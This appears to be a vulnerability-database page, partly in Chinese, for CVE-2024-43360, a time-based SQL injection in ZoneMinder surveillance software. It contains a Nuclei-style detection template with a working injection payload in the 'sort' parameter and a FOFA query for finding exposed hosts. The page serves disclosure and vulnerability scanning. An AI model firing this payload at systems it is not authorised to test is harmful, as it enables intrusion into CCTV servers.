CVE-2024-43360: ZoneMinder - SQL Injection

日期: 2025-08-01 | 影响软件: ZoneMinder | POC: 已公开

漏洞描述

ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.

PoC代码[已公开]

id: CVE-2024-43360

info:
  name: ZoneMinder - SQL Injection
  author: s4e-io
  severity: critical
  description: |
    ZoneMinder is a free, open source closed-circuit television software application. ZoneMinder is affected by a time-based SQL Injection vulnerability. This vulnerability is fixed in 1.36.34 and 1.37.61.
  reference:
    - https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-9cmr-7437-v9fj
    - https://medium.com/techpioneers/cve-2024-43360-in-depth-analysis-and-implications-for-security-75ceccc746b4
    - https://nvd.nist.gov/vuln/detail/CVE-2024-43360
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-43360
    cwe-id: CWE-89
    epss-score: 0.59107
    epss-percentile: 0.98172
    cpe: cpe:2.3:a:zoneminder:zoneminder:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: zoneminder
    product: zoneminder
    fofa-query: icon_hash="-1218152116"
  tags: cve,cve2024,zoneminder,sqli,vkev

http:
  - raw:
      - |
        @timeout 20s
        GET /zm/index.php?sort=if(now()=sysdate()%2Csleep(6)%2C0)&order=desc&limit=20&view=request&request=watch&mid=1 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'contains_all(body,"result\":\"Ok", "rows\":[")'
          - 'contains(content_type,"application/json")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100b89a793d2c70e4dbda826a8775fd5c7f41fb776e783c527fa8a7221a1f15e4dc0220673a8ed7ddb7a777a09d869e39e99248aeb21fa27ee0d108f1b7e22dacdeae44:922c64590222798bb761d5b6d8e72950

相关漏洞推荐